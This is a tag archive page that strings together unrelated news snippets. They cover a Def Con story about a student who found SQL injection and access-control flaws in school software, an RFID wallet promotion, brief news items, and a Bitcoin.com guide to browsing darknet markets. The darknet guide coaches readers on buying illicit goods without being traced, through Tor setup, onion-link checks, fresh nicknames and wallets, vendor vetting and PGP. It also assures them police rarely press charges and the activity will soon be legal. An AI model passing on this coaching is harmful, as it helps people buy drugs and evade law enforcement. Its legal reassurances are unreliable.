Safe Archives -
The label may say “no nitrites.” But that doesn’t means there are no nitrites.
The man who used to call himself “America’s Toughest Sheriff” now appears to be America’s most tenacious ex-sheriff. Joe Arpaio, who lost his bid for re-election in Arizona’s Maricopa County in 2016 and was pardoned by President Trump the following year after being convicted of criminal contempt of court , wants…
Turns out, according to one student security researcher, they’re not.
Eighteen-year-old Bill Demirkapi, a recent high school graduate in Boston, Massachusetts, spent much of his latter school years with an eye on his own student data. Through self-taught pen testing and bug hunting, Demirkapi found several vulnerabilities in a his school’s learning management system, Blackboard, and his school district’s student information system, known as Aspen and built by Follett, which centralizes student data, including performance, grades, and health records.
The former student reported the flaws and revealed his findings at the Def Con security conference on Friday.
“I’ve always been fascinated with the idea of hacking,” Demirkapi told TechCrunch prior to his talk. “I started researching but I learned by doing,” he said.
Among one of the more damaging issues Demirkapi found in Follett’s student information system was an improper access control vulnerability, which if exploited could have allowed an attacker to read and write to the central Aspen database and obtain any student’s data.
Blackboard’s Community Engagement platform had several vulnerabilities, including an information disclosure bug. A debugging misconfiguration allowed him to discover two subdomains, which spat back the credentials for Apple app provisioning accounts for dozens of school districts, as well as the database credentials for most if not every Blackboard’s Community Engagement platform, said Demirkapi.
“School data or student data should be taken as seriously as health data. The next generation should be one of our number one priorities, who looks out for those who can’t defend themselves.”
Bill Demirkapi, security researcher
Another set of vulnerabilities could have allowed an authorized user — like a student — to carry out SQL injection attacks. Demirkapi said six databases could be tricked into disclosing data by injecting SQL commands, including grades, school attendance data, punishment history, library balances, and other sensitive and private data.
Some of the SQL injection flaws were blind attacks, meaning dumping the entire database would have been more difficult but not impossible.
In all, over 5,000 schools and over five million students and teachers were impacted by the SQL injection vulnerabilities alone, he said.
Demirkapi said he was mindful to not access any student records other than his own. But he warned that any low-skilled attacker could have done considerable damage by accessing and obtaining student records, not least thanks to the simplicity of the database’s password. He wouldn’t say what it was, only that it was “worse than ‘1234’.”
But finding the vulnerabilities was only one part of the challenge. Disclosing them to the companies turned out to be just as tricky.
Demirkapi admitted that his disclosure with Follett could have been better. He found that one of the bugs gave him improper access to create his own “group resource,” such as a snippet of text, which was viewable to every user on the system.
“What does an immature 11th grader do when you hand him a very, very, loud megaphone?” he said. “Yell into it.”
And that’s exactly what he did. He sent out a message to every user, displaying each user’s login cookies on their screen. “No worries, I didn’t steal them,” the alert read.
“The school wasn’t thrilled with it,” he said. “Fortunately, I got off with a two-day suspension.”
He conceded it wasn’t one of his smartest ideas. He wanted to show his proof-of-concept but was unable to contact Follett with details of the vulnerability. He later went through his school, which set up a meeting, and disclosed the bugs to the company.
Blackboard, however, ignored Demirkapi’s responses for several months, he said. He knows because after the first month of being ignored, he included an email tracker, allowing him to see how often the email was opened — which turned out to be several times in the first few hours after sending. And yet the company still did not respond to the researcher’s bug report.
Blackboard eventually fixed the vulnerabilities, but Demirkapi said he found that the companies “weren’t really prepared to handle vulnerability reports,” despite Blackboard ostensibly having a published vulnerability disclosure process.
“It surprised me how insecure student data is,” he said. “School data or student data should be taken as seriously as health data,” he said. “The next generation should be one of our number one priorities, who looks out for those who can’t defend themselves.”
He said if a teenager had discovered serious security flaws, it was likely that more advanced attackers could do far more damage.
Heather Phillips, a spokesperson for Blackboard, said the company appreciated Demirkapi’s disclosure.
“We have addressed several issues that were brought to our attention by Mr. Demirkapi and have no indication that these vulnerabilities were exploited or that any clients’ personal information was accessed by Mr. Demirkapi or any other unauthorized party,” the statement said. “One of the lessons learned from this particular exchange is that we could improve how we communicate with security researchers who bring these issues to our attention.”
Follet spokesperson Tom Kline said the company “developed and deployed a patch to address the web vulnerability” in July 2018.
The student researcher said he was not deterred by the issues he faced with disclosure.
“I’m 100% set already on doing computer security as a career,” he said. “Just because some vendors aren’t the best examples of good responsible disclosure or have a good security program doesn’t mean they’re representative of the entire security field.”
“Don’t shoot me.” That was the message one pro-democracy protester held up, on the sort of sign usually reserved for the names of hotel guests, as demonstrators camped out in the arrivals hall of Hong Kong International Airport on Friday, July 26.
CNN.com – RSS Channel – World
In this day and age, carrying your wallet, passport and mobile phone inside the inner pocket of your jacket is simply not enough to protect your assets. Thankfully, there’s a company called Tarriss which offers products designed to secure both your digital cash and personal data. It sells them for cryptocurrency and it takes bitcoin cash.
Tarriss Accepts Bitcoin Cash and Ships Globally
Nowadays your electronic money and your digital identity are exposed to various invisible risks. You can be robbed, tracked and hacked remotely. Wireless technologies can provide third parties with unwarranted access to your most precious data.
That’s why Tarriss, a company based in the Canadian city of Vancouver, has set out to develop protection for the money, documents and gadgets you’ll use while traveling, for example. It creates wireless signal blocking RFID and Faraday Cage products that safeguard your electronic devices from damage and your privacy from being compromised.
The platform ships these items worldwide and accepts major cryptocurrencies like bitcoin cash (BCH), bitcoin core (BTC), ethereum (ETH), and litecoin (LTC), beside traditional payment methods such as Mastercard and Apple Pay. The prices on their website can be denominated in six fiat currencies – U.S. dollar, Canadian dollar, Australian dollar, British pound, euro, and Japanese yen.
Among the products offered by Tarriss, you’ll find the RFID Passport Holder & Neck Wallet. It’s a smart invention that protects your RFID enabled credit cards and international passport. They also sell an RFID Money Belt & Hidden Travel, in case you prefer the fanny pack style solutions.
You can also order the Godark Faraday Bag which blocks EMF frequencies, EMR, wifi, cellular and Bluetooth signals. These inventions will give you the peace of mind you need in the modern age, when cards and passports come with chips, and mobile devices with GPS and NFC capabilities can be tracked and hacked.
Have you considered buying products like those developed and sold by Tarriss? Tell us in the comments section below.
Disclaimer: Readers should do their own due diligence before taking any actions related to third party companies or any of their affiliates or services. Bitcoin.com is not responsible, directly or indirectly, for any damage or loss caused or alleged to be caused by or in connection with the use of or reliance on any third party content, goods or services mentioned in this article.
Images courtesy of Shutterstock, Tarriss.
Do you need a reliable Bitcoin mobile wallet to send, receive, and store your coins? Download one for free from us and then head to our Purchase Bitcoin page where you can quickly buy BCH and BTC with a credit card.
The post Keep Your Money and Passport Safe With Products You Can Buy With BCH appeared first on Bitcoin News.
3:19 PM PT — ROD SMART HAS BEEN FOUND SAFE!! Family and police sources tell us Smart has been located and he’s safe. We’re told Smart is surrounded by family and in the process of getting professional treatment. Story developing…
If you’re planning to visit a darknet market, you’re either keen to window shop or keen to sample the wares. Whatever your reasons for stopping by, that’s your business and no one else’s. Unfortunately, not everyone shares those civilized ideals. To keep those spoilsports at bay, here’s how to browse darknet markets (DNMs) without leaving a trace.
Step 1: Don’t Sweat It
If your interest in darknet market extends to becoming a vendor, this guide isn’t for you. For one thing, you should already know this stuff, and for another, you should be following more rigorous opsec. If you’re a casual DNM shopper, however, and aren’t ordering your goods by the pound or kilo, don’t sweat it. The powers that be don’t have the time or resources to pester every single DNM customer. Even when entire marketplaces get compromised, exposing the details of thousands of users who were too lazy to encrypt their comms, it’s rare that anything comes of it.
If you’re a persistent DNM shopper and the postal service takes note of fragrant packages winging their way to your door, you might receive a ‘love letter’ from the police warning you to cease your activities, or even a knock at the door. Should that occur, don’t be cowed as the feds are unlikely to press charges. Even LE seem to begrudgingly concede that prosecuting victimless misdemeanors is a pointless exercise. Remember, most of this stuff will be made legal within our lifetime. It’s only a crime for a limited time.
Step 2: Configure Tor Correctly
To access the darknet, you’ll need the Tor web browser. It can be downloaded for desktop or for Android. Alternatively, use the Brave or Dissenter browsers, which give the ability to open a Tor window, directly connecting you to the onion router where the world’s finest darknet markets are awaiting your perusal. The Tor Project website contains guides on protecting your privacy when using the darknet. Tor browser will automatically block plugins such as Flash, Realplayer, and Quicktime, which can be manipulated into revealing your IP address, and comes with pro-privacy plugins HTTPS Everywhere and No Script. When configured correctly, Tor will mask your IP address, but it remains your responsibility not to dox yourself by doing dumb stuff on the darknet. Tor’s an internet relay – not a cloak of anonymity and immunity.
Step 3: Double Check Your Onion Domains
Given that the average onion domain reads something like “7aj5bhidezdbb4ov” (that’s Empire market at the time of publication), it’s easy for a fat finger or phishing link to send you one character astray to a lookalike site that will keep your crypto and despatch the square root of zero to your door. Due to the takedown of darknet news site Deepdotweb earlier this year, there aren’t many reliable clearnet DNM guides left. Dark.fail has done an admirable job lately, but reliance on a single point of failure is risky. Double check all links with those shared by DNM admins on onion forum Dread.
Step 4: Keep It Fresh
Cryptocurrency wallet addresses are like nicknames: they don’t cost a penny and you’re free to use as many as you like. As such, there’s no excuse for recycling handles. Use a unique username and password for every DNM you join – that means a nickname you haven’t previously used anywhere else for anything. The annals of darknet criminology are filled with preventable tales of nickname reuse. Just ask Ross “Frosty” Ulbricht.
Similarly, when you’re sending funds to or from a DNM, create a new wallet address each time. If your crypto wallet app doesn’t let you create a new address, delete it and install one that does. For more tips on how to stay safe on the darknet, check out this week’s Humans of Bitcoin podcast, around the 15-minute mark, in which I discuss the perils of address and nickname reuse with host Matt Aaron.
Step 5: Know Your Vendor
When you log in to a darknet market for the first time, you’re greeted by a cornucopia of beguiling wares begging for your bitcoin. It’s like a magical Willie Wonka tuckshop for grownups. Before you start popping pills into your shopping cart, however, take a close look at the vendor you’re buying from. You wouldn’t make a $ 300 purchase from an Ebay vendor with zero feedback. It’s the same on the darknet. Most vendors are legit, and have no intention of scamming their customers, but don’t trust – verify by checking their feedback. Bear in mind that a vendor with 100 four-star ratings is significantly more trustworthy than a vendor with five stars and three sales.
Step 6: Always Encrypt
The first time you try to use PGP (also known as GPG), it’ll take you 15 minutes to install and successfully encrypt your first message to your darknet vendor. The second time will take you five minutes, the third time 60 seconds, and the fourth time you’ll be embarrassed at the thought of having ever communicated bareback on the darknet without PGP. News.Bitcoin.com plans to publish a comprehensive guide to PGP in the near future, but till then, your search engine is your friend. Don’t rely on darknet markets to encrypt on your behalf by ticking the request box upon submitting your order. If the site’s servers get infiltrated by law enforcement, your conversations will be exposed.
There’s another benefit to being au fait with PGP, incidentally: when a vendor begins selling on a new marketplace, as commonly happens, given the short lifespan of DNMs, sharing their public key shows that they are the same entity, and effectively allows them to import the goodwill they’ve accrued elsewhere.
Freedom Thrives on the Darknet
Browsing the darknet is one of the most pleasurable things you can do on the web. It’s an internet free of popups, autoplay ads, cookies opt-ins, trigger warnings, snowflakes, thought police and killjoys. It’s everything the clearnet used to be, with the added bonus that you can buy just about anything with cryptocurrencies such as BTC, BCH, LTC, and XMR. You don’t have to nurse a penchant for the sort of goods the darknet is synonymous with to fire up your Tor browser – you simply need to appreciate the sense of freedom that comes from browsing the web unencumbered. Darknet is love. Darknet is life.
What’s your favorite darknet market? Let us know in the comments section below.
Images courtesy of Shutterstock, and Pixabay.
Disclaimer: Readers should do their own due diligence before taking any actions related to third-party companies, darknet markets, or any of their affiliates or services. Bitcoin.com is not responsible, directly or indirectly, for any damage or loss caused or alleged to be caused by or in connection with the use of or reliance on any third party content, goods or services mentioned in this article.
Many experts tried to open a safe locked for 40 years. A tourist’s lucky guess cracked the code on his first tryJune 6, 2019 | dailybusinessnews
Over the years, the small Vermilion Heritage Museum in Alberta, Canada, tried everything in its power to unlock an old safe tucked away in its basement.
CNN.com – RSS Channel – Regions – Americas
There are many elements to safety, and in determining this year’s safest states in America, WalletHub looked at dozens of them. The site compared all 50 states across 52 safety indicators from the areas of personal and residential safety (things like terrorist attacks, mass shootings, violent crimes, overdoses, suicides), financial…